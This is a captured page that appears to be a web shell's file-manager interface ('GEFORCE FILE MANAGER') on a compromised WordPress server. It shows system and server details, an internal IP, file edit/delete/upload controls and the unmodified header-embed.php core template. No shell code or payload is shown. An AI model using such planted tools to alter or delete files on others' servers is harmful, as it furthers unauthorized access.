[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-includes
/
theme-compat
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 comments.php
2,148 B
SET
[ EDIT ]
|
[ DEL ]
📄 embed-404.php
967 B
SET
[ EDIT ]
|
[ DEL ]
📄 embed-content.php
3,484 B
SET
[ EDIT ]
|
[ DEL ]
📄 embed.php
481 B
SET
[ EDIT ]
|
[ DEL ]
📄 footer-embed.php
438 B
SET
[ EDIT ]
|
[ DEL ]
📄 footer.php
1,055 B
SET
[ EDIT ]
|
[ DEL ]
📄 header-embed.php
702 B
SET
[ EDIT ]
|
[ DEL ]
📄 header.php
1,892 B
SET
[ EDIT ]
|
[ DEL ]
📄 sidebar.php
4,489 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: header-embed.php
<?php /** * Contains the post embed header template * * When a post is embedded in an iframe, this file is used to create the header output * if the active theme does not include a header-embed.php template. * * @package WordPress * @subpackage Theme_Compat * @since 4.5.0 */ if ( ! headers_sent() ) { header( 'X-WP-embed: true' ); } ?> <!DOCTYPE html> <html <?php language_attributes(); ?> class="no-js"> <head> <title><?php echo wp_get_document_title(); ?></title> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <?php /** * Prints scripts or data in the embed template head tag. * * @since 4.4.0 */ do_action( 'embed_head' ); ?> </head> <body <?php body_class(); ?>>